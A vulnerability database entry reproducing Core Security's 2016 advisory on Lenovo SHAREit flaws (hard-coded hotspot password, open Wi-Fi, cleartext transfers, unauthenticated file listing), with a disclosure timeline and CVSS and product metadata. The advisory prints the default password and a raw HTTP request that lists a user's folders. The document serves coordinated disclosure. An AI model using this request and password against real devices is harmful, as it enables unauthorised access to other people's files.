VAR-201601-0460
Vulnerability from variot - Updated: 2024-02-06 22:43Lenovo SHAREit before 3.2.0 for Windows and SHAREit before 3.5.48_ww for Android transfer files in cleartext, which allows remote attackers to (1) obtain sensitive information by sniffing the network or (2) conduct man-in-the-middle (MITM) attacks via unspecified vectors. Supplementary information : CWE Vulnerability type by CWE-254: Security Features ( Security function ) Has been identified. http://cwe.mitre.org/data/definitions/254.htmlBy a third party (1) By intercepting the network, important information can be obtained, or (2) Middle man (man-in-the-middle/MITM) An attack may be executed. Lenovo ShareIT is prone to multiple security vulnerabilities. An attacker can exploit these issues to bypass certain security restrictions and gain access to sensitive information, to perform man-in-the-middle attacks and bypass authorization mechanism. Lenovo SHAREit (Eggplant Express) is a set of file sharing software from China Lenovo (Lenovo). 1. Advisory Information
Title: Lenovo ShareIT Multiple Vulnerabilities Advisory ID: CORE-2016-0002 Advisory URL: http://www.coresecurity.com/advisories/lenovo-shareit-multiple-vulnerabilities Date published: 2016-01-25 Date of last update: 2016-01-22 Vendors contacted: Lenovo Release mode: Coordinated release
- Vulnerability Information
Class: Use of Hard-coded Password [CWE-259], Information Exposure [CWE-200], Missing Encryption of Sensitive Data [CWE-311], Missing Authorization [CWE-862] Impact: Security bypass, Information leak Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2016-1491, CVE-2016-1490, CVE-2016-1489, CVE-2016-1492
- Vulnerability Description
SHAREit [1] is a free application from Lenovo [2] that lets you easily share files and folders among smartphones, tablets, and personal computers.
- Vulnerable Packages
Lenovo SHAREit for Android 3.0.18_ww Lenovo SHAREit for Windows 2.5.1.1 Other products and versions may also be affected, but they were not tested.
- Vendor Information, Solutions and Workarounds
Lenovo released an updated version of Lenovo SHAREit for Windows and Android that fix the reported issues.
The new version of the products can be found here [1].
- Credits
This vulnerability was discovered and researched by Ivan Huertas from Core Security Consulting Team. The publication of this advisory was coordinated by Joaquín Rodríguez Varela from Core Security Advisories Team.
- Technical Description / Proof of Concept Code
7.1. Hard-coded password in Lenovo SHAREit for Windows
[CVE-2016-1491] When Lenovo SHAREit for Windows is configured to receive files, a Wifi HotSpot is set with an easy password (12345678). Any system with a Wifi Network card could connect to that Hotspot by using that password. The password is always the same.
7.2. Remote browsing of file system on Lenovo SHAREit for Windows
[CVE-2016-1490] When the WiFi network is on and connected with the default password (12345678), the files can be browsed but not downloaded by performing an HTTP Request to the WebServer launched by Lenovo SHAREit. The following request was used to perform this action:
POST /list?type=file&path=C%3A%5CUsers\admin HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; XT1032 Build/KXB21.14-L1.40) Host: 192.168.173.1:2999 Connection: Keep-Alivek Accept-Encoding: gzip Content-Length: 0 HTTP/1.0 200 OK Content-Length: 2426
{"containers":[{"filepath":"C:\Users\admin\Contacts","has_thumbnail":false,"id":"C:\Users\admin\Contacts","isloaded":false,"isroot":false,"isvolume":false,"name":"Contacts","type":"file","ver":""},{"filepath":"C:\Users\admin\Desktop","has_thumbnail":false,"id":"C:\Users\admin\Desktop","isloaded":false,"isroot":false,"isvolume":false,"name":"Desktop","type":"file","ver":""},{"filepath":"C:\Users\admin\Documents","has_thumbnail":false,"id":"C:\Users\admin\Documents","isloaded":false,"isroot":false,"isvolume":false,"name":"Documents","type":"file","ver":""},{"filepath":"C:\Users\admin\Downloads","has_thumbnail":false,"id":"C:\Users\admin\Downloads","isloaded":false,"isroot":false,"isvolume":false,"name":"Downloads","type":"file","ver":""},{"filepath":"C:\Users\admin\Favorites","has_thumbnail":false,"id":"C:\Users\admin\Favorites","isloaded":false,"isroot":false,"isvolume":false,"name":"Favorites","type":"file","ver":""},{"filepath":"C:\Users\admin\Links", "has_thumbnail":false,"id":"C:\Users\admin\Links","isloaded":false,"isroot":false,"isvolume":false,"name":"Links","type":"file","ver":""},{"filepath":"C:\Users\admin\Music","has_thumbnail":false,"id":"C:\Users\admin\Music","isloaded":false,"isroot":false,"isvolume":false,"name":"My Music","type":"file","ver":""},{"filepath":"C:\Users\admin\Pictures","has_thumbnail":false,"id":"C:\Users\admin\Pictures","isloaded":false,"isroot":false,"isvolume":false,"name":"My Pictures","type":"file","ver":""},{"filepath":"C:\Users\admin\Saved Games","has_thumbnail":false,"id":"C:\Users\admin\Saved Games","isloaded":false,"isroot":false,"isvolume":false,"name":"Saved Games","type":"file","ver":""},{"filepath":"C:\Users\admin\Searches","has_thumbnail":false,"id":"C:\Users\admin\Searches","isloaded":false,"isroot":false,"isvolume":false,"name":"Searches","type":"file","ver":""},{"filepath":"C:\Users\admin\Tracing","has_thumbnail":false,"id":"C:\Users\admin\Tracing","isloaded":false,"isroot":false,"isvolume":false,"name":"Tracing","type":"file","ver":""},{"filepath":"C:\Users\admin\Videos","has_thumbnail":false,"id":"C:\Users\admin\Videos","isloaded":false,"isroot":false,"isvolume":false,"name":"My ","type":"file","ver":""}],"filepath":"C:\Users\admin","has_thumbnail":false,"id":"C:\Users\admin","isloaded":true,"isroot":false,"isvolume":false,"name":"admin","type":"file","ver":""}
7.3. Files transferred in plain text in Windows and Android version of Lenovo SHAREit
[CVE-2016-1489] The files are transfered via HTTP without encryption.
7.4. Open WiFi Network defined on Android devices
[CVE-2016-1492] When the application is configured to receive files, an open Wifi HotSpot is created without any password. An attacker could connect to that HotSpot and capture the information transferred between those devices.
- Report Timeline
2015-10-29: Core Security sent an initial notification to Lenovo. 2015-10-29: Lenovo replied attaching their public PGP key. 2015-10-29: Core Security sent Lenovo a draft version of the advisory and requested a tentative day for the release of the patched version. 2015-10-29: Lenovo replied their development team would review Core Security findings. 2015-11-06: Lenovo informed that they would like to discuss their progress in a telephone meeting. 2015-11-06: Core Security replied Lenovo that is our policy not to have such communications in order to always keep a log of all interactions with the vendor. 2015-11-06: Lenovo replied they understood Core Security policy and asked if the first disclosure date was negotiable. 2015-11-06: Core Security replied Lenovo that the date was negotiable, being the priority to make a coordinated release. 2015-11-13: Lenovo informed Core Security they had addressed the Windows version issues and could share a beta fix for us to validate. They informed as well that the development team would continue to investigate the Android version issues. 2015-11-20: Lenovo asked Core Security for feedback regarding their beta fix. 2015-11-20: Core Security replied saying there was a small delay in the review of the beta fix and informed Lenovo they would send a reply next week. 2015-11-20: Lenovo asked Core Security to confirm that the publication date of the advisory was not going to be on November 30, and asked to seek an agreement regarding a specific date. 2015-11-23: Core Security replied stating that they were not going to publish their findings on November 30, and the idea was to coordinate a schedule according to the release date of the corrected versions. Additionally, Core Security informed Lenovo regarding the beta fix, which was still using the hardcoded password. 2015-11-23: Lenovo informed Core Security that they had forwarded Core's analysis to their development team. 2015-11-25: Lenovo informed Core Security that they considered that issue as resolved considering that the hardcoded password was not present in the "secure mode" and only used in the "easy mode". 2015-12-06: Lenovo informed Core Security that they were still working on the schedule. 2015-12-07: Lenovo informed Core Security that they were targeting to release the updated Windows version on January 10 and that they would continue working with their third party partner for the Android version release. 2016-01-04: Core Security asked Lenovo if the publication date could be moved from Sunday 10 to Monday 11 of January. 2016-01-04: Lenovo asked Core Security for more specific justifications for not releasing on a Sunday. 2016-01-05: Core Security informed Lenovo that is always recommend to publish on a working day in order to give enough time to the affected users to update their products (particularly corporate users) and avoid explotations of the published flaws by malicious users on the weekend. 2016-01-05: Lenovo informed Core Security that they agreed to publish on Monday 11 but that they hadn't planned a date for their advisory disclosure. 2016-01-05: Core Security informed Lenovo that our advisory would be published the same day as the release of the new version. 2015-01-05: Lenovo informed Core Security that they would publish their advisory concurrently with Core's advisory. Lenovo requested a draft version of the advisory in order to ensure consistency among publications. They asked how Core would like to be acknowledged in their advisory and offered additional publication dates in case they couldn't meet the Monday 11 deadline. 2016-01-05: Core Security informed Lenovo that the additional publication dates ares acceptable if Core is informed with time of such changes. We informed that we would send them a draft of the advisory once it was completed and sent them the acknowledgment line as requested. 2016-01-06: Core Security sent Lenovo the draft version of the advisory. 2016-01-08: Lenovo informed Core Security that due they discovered additional vulnerabilities they requested to address both platform issues together. Additionaly thay requested an extension to the publication date to mid-February and a possibility to keep updating Lenovo SHAREit. 2016-01-08: Core Security informed Lenovo that it was our first request to address all vulnerabilities in one advisory. Additinally we requested to know which vulnerabilities they were planning to address, and if those included any of the reported by us. We expressed our willingness to extend the deadline even though the maximum 3 months period we define was already over. 2016-01-08: Lenovo informed Core Security that they intend to address al the reported vulnerabilities by us and requested confimration on extending the date of our joint disclosure to mid-February 2016-01-08: Core Security informed Lenovo that we wanted to know exactly when each vulnerability was going to be addressed in advanced in order to agree to extend the date of our joint disclosure. 2016-01-08: Lenovo informed Core Security that they agreed to our terms. 2016-01-14: Lenovo informed Core Security that they were going to publish the new versions for both platforms addressing all the reported vulnerabilities on January 15 and expected to release the joint disclosure on mid-February. 2016-01-14: Core Security informed Lenovo that is our policy to disclose our findings once the new version correcting the issues becomes available. We informed them that if that was going to happen the following day, we would be forced to publish our security advisory the following day as well. 2016-01-15: Lenovo informed Core Security that they misunderstood our disclosure policy. They informed us that they would probably be publishing the following week and no later than January 22. 2016-01-15: Core Security informed Lenovo that we commited to a joint security disclosure the day the software releases went live and requested an advanced notice as soon as they could. 2016-01-19: Lenovo informed Core Security that they agreed to our request. 2016-01-20: Core Security informed Lenovo that they would be publishing both versions on Friday 22 of January. 2016-01-20: Core Security requested Lenovo to release the updates on Monday 25 of January as it was recommended before in order to give the affected users enough working days to download and install the new version. 2016-01-21: Lenovo informed Core Security that they agreed to release on Monday, January 25. They also informed that they would be publishing their security advisory as well. 2016-01-25: Advisory CORE-2016-0002 published. 9. References
[1] http://shareit.lenovo.com/#DOWNLOAD. [2] http://www.lenovo.com.
- About CoreLabs
CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.
- About Core Security Technologies
Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com.
- Disclaimer
The contents of this advisory are copyright (c) 2015 Core Security and (c) 2015 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
- PGP/GPG Keys
This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201601-0460",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "shareit",
"scope": "lte",
"trust": 1.0,
"vendor": "lenovo",
"version": "2.5.1.1"
},
{
"model": "shareit",
"scope": "lte",
"trust": 1.0,
"vendor": "lenovo",
"version": "3.0.18_ww"
},
{
"model": "shareit",
"scope": "lt",
"trust": 0.8,
"vendor": "lenovo",
"version": "3.2.0 (windows)"
},
{
"model": "shareit",
"scope": "lt",
"trust": 0.8,
"vendor": "lenovo",
"version": "3.5.48_ww (android)"
},
{
"model": "shareit",
"scope": "eq",
"trust": 0.6,
"vendor": "lenovo",
"version": "3.0.18_ww"
},
{
"model": "shareit",
"scope": "eq",
"trust": 0.6,
"vendor": "lenovo",
"version": "2.5.1.1"
},
{
"model": "shareit for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "lenovo",
"version": "2.5.1.1"
},
{
"model": "shareit for android 3.0.18 ww",
"scope": null,
"trust": 0.3,
"vendor": "lenovo",
"version": null
}
],
"sources": [
{
"db": "BID",
"id": "81748"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001336"
},
{
"db": "CNNVD",
"id": "CNNVD-201601-635"
},
{
"db": "NVD",
"id": "CVE-2016-1489"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:lenovo:shareit:*:*:*:*:*:windows:*:*",
"cpe_name": [],
"versionEndIncluding": "2.5.1.1",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:lenovo:shareit:*:*:*:*:*:android:*:*",
"cpe_name": [],
"versionEndIncluding": "3.0.18_ww",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2016-1489"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Ivan Huertas from Core Security Consulting Team.",
"sources": [
{
"db": "BID",
"id": "81748"
}
],
"trust": 0.3
},
"cve": "CVE-2016-1489",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 5.5,
"impactScore": 4.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:A/AC:M/Au:N/C:P/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Adjacent Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.3,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2016-1489",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:A/AC:M/Au:N/C:P/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 5.5,
"id": "VHN-90308",
"impactScore": 4.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:A/AC:M/AU:N/C:P/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "HIGH",
"attackVector": "ADJACENT_NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 8.0,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.6,
"impactScore": 5.8,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2016-1489",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2016-1489",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-201601-635",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-90308",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2016-1489",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-90308"
},
{
"db": "VULMON",
"id": "CVE-2016-1489"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001336"
},
{
"db": "CNNVD",
"id": "CNNVD-201601-635"
},
{
"db": "NVD",
"id": "CVE-2016-1489"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Lenovo SHAREit before 3.2.0 for Windows and SHAREit before 3.5.48_ww for Android transfer files in cleartext, which allows remote attackers to (1) obtain sensitive information by sniffing the network or (2) conduct man-in-the-middle (MITM) attacks via unspecified vectors. Supplementary information : CWE Vulnerability type by CWE-254: Security Features ( Security function ) Has been identified. http://cwe.mitre.org/data/definitions/254.htmlBy a third party (1) By intercepting the network, important information can be obtained, or (2) Middle man (man-in-the-middle/MITM) An attack may be executed. Lenovo ShareIT is prone to multiple security vulnerabilities. \nAn attacker can exploit these issues to bypass certain security restrictions and gain access to sensitive information, to perform man-in-the-middle attacks and bypass authorization mechanism. Lenovo SHAREit (Eggplant Express) is a set of file sharing software from China Lenovo (Lenovo). 1. Advisory Information\n\nTitle: Lenovo ShareIT Multiple Vulnerabilities\nAdvisory ID: CORE-2016-0002\nAdvisory URL: http://www.coresecurity.com/advisories/lenovo-shareit-multiple-vulnerabilities\nDate published: 2016-01-25\nDate of last update: 2016-01-22\nVendors contacted: Lenovo\nRelease mode: Coordinated release\n\n2. Vulnerability Information\n\nClass: Use of Hard-coded Password [CWE-259], Information Exposure [CWE-200], Missing Encryption of Sensitive Data [CWE-311], Missing Authorization [CWE-862]\nImpact: Security bypass, Information leak\nRemotely Exploitable: Yes\nLocally Exploitable: No\nCVE Name: CVE-2016-1491, CVE-2016-1490, CVE-2016-1489, CVE-2016-1492\n\n \n\n3. Vulnerability Description\n\nSHAREit [1] is a free application from Lenovo [2] that lets you easily share files and folders among smartphones, tablets, and personal computers. \n\n4. Vulnerable Packages\n\nLenovo SHAREit for Android 3.0.18_ww\nLenovo SHAREit for Windows 2.5.1.1\nOther products and versions may also be affected, but they were not tested. \n\n5. Vendor Information, Solutions and Workarounds\n\nLenovo released an updated version of Lenovo SHAREit for Windows and Android that fix the reported issues. \n\nThe new version of the products can be found here [1]. \n\n6. Credits\n\nThis vulnerability was discovered and researched by Ivan Huertas from Core Security Consulting Team. The publication of this advisory was coordinated by Joaqu\u00edn Rodr\u00edguez Varela from Core Security Advisories Team. \n\n \n\n7. Technical Description / Proof of Concept Code\n\n7.1. Hard-coded password in Lenovo SHAREit for Windows\n\n[CVE-2016-1491] When Lenovo SHAREit for Windows is configured to receive files, a Wifi HotSpot is set with an easy password (12345678). Any system with a Wifi Network card could connect to that Hotspot by using that password. The password is always the same. \n\n7.2. Remote browsing of file system on Lenovo SHAREit for Windows\n\n[CVE-2016-1490] When the WiFi network is on and connected with the default password (12345678), the files can be browsed but not downloaded by performing an HTTP Request to the WebServer launched by Lenovo SHAREit. The following request was used to perform this action:\n\n \nPOST /list?type=file\u0026path=C%3A%5CUsers\\admin HTTP/1.1\nContent-Type: application/x-www-form-urlencoded\nUser-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; XT1032 Build/KXB21.14-L1.40)\nHost: 192.168.173.1:2999\nConnection: Keep-Alivek\nAccept-Encoding: gzip\nContent-Length: 0\nHTTP/1.0 200 OK\nContent-Length: 2426\n\n\n{\"containers\":[{\"filepath\":\"C:\\\\Users\\\\admin\\\\Contacts\",\"has_thumbnail\":false,\"id\":\"C:\\\\Users\\\\admin\\\\Contacts\",\"isloaded\":false,\"isroot\":false,\"isvolume\":false,\"name\":\"Contacts\",\"type\":\"file\",\"ver\":\"\"},{\"filepath\":\"C:\\\\Users\\\\admin\\\\Desktop\",\"has_thumbnail\":false,\"id\":\"C:\\\\Users\\\\admin\\\\Desktop\",\"isloaded\":false,\"isroot\":false,\"isvolume\":false,\"name\":\"Desktop\",\"type\":\"file\",\"ver\":\"\"},{\"filepath\":\"C:\\\\Users\\\\admin\\\\Documents\",\"has_thumbnail\":false,\"id\":\"C:\\\\Users\\\\admin\\\\Documents\",\"isloaded\":false,\"isroot\":false,\"isvolume\":false,\"name\":\"Documents\",\"type\":\"file\",\"ver\":\"\"},{\"filepath\":\"C:\\\\Users\\\\admin\\\\Downloads\",\"has_thumbnail\":false,\"id\":\"C:\\\\Users\\\\admin\\\\Downloads\",\"isloaded\":false,\"isroot\":false,\"isvolume\":false,\"name\":\"Downloads\",\"type\":\"file\",\"ver\":\"\"},{\"filepath\":\"C:\\\\Users\\\\admin\\\\Favorites\",\"has_thumbnail\":false,\"id\":\"C:\\\\Users\\\\admin\\\\Favorites\",\"isloaded\":false,\"isroot\":false,\"isvolume\":false,\"name\":\"Favorites\",\"type\":\"file\",\"ver\":\"\"},{\"filepath\":\"C:\\\\Users\\\\admin\\\\Links\",\n\"has_thumbnail\":false,\"id\":\"C:\\\\Users\\\\admin\\\\Links\",\"isloaded\":false,\"isroot\":false,\"isvolume\":false,\"name\":\"Links\",\"type\":\"file\",\"ver\":\"\"},{\"filepath\":\"C:\\\\Users\\\\admin\\\\Music\",\"has_thumbnail\":false,\"id\":\"C:\\\\Users\\\\admin\\\\Music\",\"isloaded\":false,\"isroot\":false,\"isvolume\":false,\"name\":\"My\nMusic\",\"type\":\"file\",\"ver\":\"\"},{\"filepath\":\"C:\\\\Users\\\\admin\\\\Pictures\",\"has_thumbnail\":false,\"id\":\"C:\\\\Users\\\\admin\\\\Pictures\",\"isloaded\":false,\"isroot\":false,\"isvolume\":false,\"name\":\"My\nPictures\",\"type\":\"file\",\"ver\":\"\"},{\"filepath\":\"C:\\\\Users\\\\admin\\\\Saved\nGames\",\"has_thumbnail\":false,\"id\":\"C:\\\\Users\\\\admin\\\\Saved\nGames\",\"isloaded\":false,\"isroot\":false,\"isvolume\":false,\"name\":\"Saved\nGames\",\"type\":\"file\",\"ver\":\"\"},{\"filepath\":\"C:\\\\Users\\\\admin\\\\Searches\",\"has_thumbnail\":false,\"id\":\"C:\\\\Users\\\\admin\\\\Searches\",\"isloaded\":false,\"isroot\":false,\"isvolume\":false,\"name\":\"Searches\",\"type\":\"file\",\"ver\":\"\"},{\"filepath\":\"C:\\\\Users\\\\admin\\\\Tracing\",\"has_thumbnail\":false,\"id\":\"C:\\\\Users\\\\admin\\\\Tracing\",\"isloaded\":false,\"isroot\":false,\"isvolume\":false,\"name\":\"Tracing\",\"type\":\"file\",\"ver\":\"\"},{\"filepath\":\"C:\\\\Users\\\\admin\\\\Videos\",\"has_thumbnail\":false,\"id\":\"C:\\\\Users\\\\admin\\\\Videos\",\"isloaded\":false,\"isroot\":false,\"isvolume\":false,\"name\":\"My\n\",\"type\":\"file\",\"ver\":\"\"}],\"filepath\":\"C:\\\\Users\\\\admin\",\"has_thumbnail\":false,\"id\":\"C:\\\\Users\\\\admin\",\"isloaded\":true,\"isroot\":false,\"isvolume\":false,\"name\":\"admin\",\"type\":\"file\",\"ver\":\"\"}\n \n7.3. Files transferred in plain text in Windows and Android version of Lenovo SHAREit\n\n[CVE-2016-1489] The files are transfered via HTTP without encryption. \n\n7.4. Open WiFi Network defined on Android devices\n\n[CVE-2016-1492] When the application is configured to receive files, an open Wifi HotSpot is created without any password. An attacker could connect to that HotSpot and capture the information transferred between those devices. \n\n \n\n8. Report Timeline\n\n2015-10-29: Core Security sent an initial notification to Lenovo. \n2015-10-29: Lenovo replied attaching their public PGP key. \n2015-10-29: Core Security sent Lenovo a draft version of the advisory and requested a tentative day for the release of the patched version. \n2015-10-29: Lenovo replied their development team would review Core Security findings. \n2015-11-06: Lenovo informed that they would like to discuss their progress in a telephone meeting. \n2015-11-06: Core Security replied Lenovo that is our policy not to have such communications in order to always keep a log of all interactions with the vendor. \n2015-11-06: Lenovo replied they understood Core Security policy and asked if the first disclosure date was negotiable. \n2015-11-06: Core Security replied Lenovo that the date was negotiable, being the priority to make a coordinated release. \n2015-11-13: Lenovo informed Core Security they had addressed the Windows version issues and could share a beta fix for us to validate. They informed as well that the development team would continue to investigate the Android version issues. \n2015-11-20: Lenovo asked Core Security for feedback regarding their beta fix. \n2015-11-20: Core Security replied saying there was a small delay in the review of the beta fix and informed Lenovo they would send a reply next week. \n2015-11-20: Lenovo asked Core Security to confirm that the publication date of the advisory was not going to be on November 30, and asked to seek an agreement regarding a specific date. \n2015-11-23: Core Security replied stating that they were not going to publish their findings on November 30, and the idea was to coordinate a schedule according to the release date of the corrected versions. Additionally, Core Security informed Lenovo regarding the beta fix, which was still using the hardcoded password. \n2015-11-23: Lenovo informed Core Security that they had forwarded Core\u0027s analysis to their development team. \n2015-11-25: Lenovo informed Core Security that they considered that issue as resolved considering that the hardcoded password was not present in the \"secure mode\" and only used in the \"easy mode\". \n2015-12-06: Lenovo informed Core Security that they were still working on the schedule. \n2015-12-07: Lenovo informed Core Security that they were targeting to release the updated Windows version on January 10 and that they would continue working with their third party partner for the Android version release. \n2016-01-04: Core Security asked Lenovo if the publication date could be moved from Sunday 10 to Monday 11 of January. \n2016-01-04: Lenovo asked Core Security for more specific justifications for not releasing on a Sunday. \n2016-01-05: Core Security informed Lenovo that is always recommend to publish on a working day in order to give enough time to the affected users to update their products (particularly corporate users) and avoid explotations of the published flaws by malicious users on the weekend. \n2016-01-05: Lenovo informed Core Security that they agreed to publish on Monday 11 but that they hadn\u0027t planned a date for their advisory disclosure. \n2016-01-05: Core Security informed Lenovo that our advisory would be published the same day as the release of the new version. \n2015-01-05: Lenovo informed Core Security that they would publish their advisory concurrently with Core\u0027s advisory. Lenovo requested a draft version of the advisory in order to ensure consistency among publications. They asked how Core would like to be acknowledged in their advisory and offered additional publication dates in case they couldn\u0027t meet the Monday 11 deadline. \n2016-01-05: Core Security informed Lenovo that the additional publication dates ares acceptable if Core is informed with time of such changes. We informed that we would send them a draft of the advisory once it was completed and sent them the acknowledgment line as requested. \n2016-01-06: Core Security sent Lenovo the draft version of the advisory. \n2016-01-08: Lenovo informed Core Security that due they discovered additional vulnerabilities they requested to address both platform issues together. Additionaly thay requested an extension to the publication date to mid-February and a possibility to keep updating Lenovo SHAREit. \n2016-01-08: Core Security informed Lenovo that it was our first request to address all vulnerabilities in one advisory. Additinally we requested to know which vulnerabilities they were planning to address, and if those included any of the reported by us. We expressed our willingness to extend the deadline even though the maximum 3 months period we define was already over. \n2016-01-08: Lenovo informed Core Security that they intend to address al the reported vulnerabilities by us and requested confimration on extending the date of our joint disclosure to mid-February\n2016-01-08: Core Security informed Lenovo that we wanted to know exactly when each vulnerability was going to be addressed in advanced in order to agree to extend the date of our joint disclosure. \n2016-01-08: Lenovo informed Core Security that they agreed to our terms. \n2016-01-14: Lenovo informed Core Security that they were going to publish the new versions for both platforms addressing all the reported vulnerabilities on January 15 and expected to release the joint disclosure on mid-February. \n2016-01-14: Core Security informed Lenovo that is our policy to disclose our findings once the new version correcting the issues becomes available. We informed them that if that was going to happen the following day, we would be forced to publish our security advisory the following day as well. \n2016-01-15: Lenovo informed Core Security that they misunderstood our disclosure policy. They informed us that they would probably be publishing the following week and no later than January 22. \n2016-01-15: Core Security informed Lenovo that we commited to a joint security disclosure the day the software releases went live and requested an advanced notice as soon as they could. \n2016-01-19: Lenovo informed Core Security that they agreed to our request. \n2016-01-20: Core 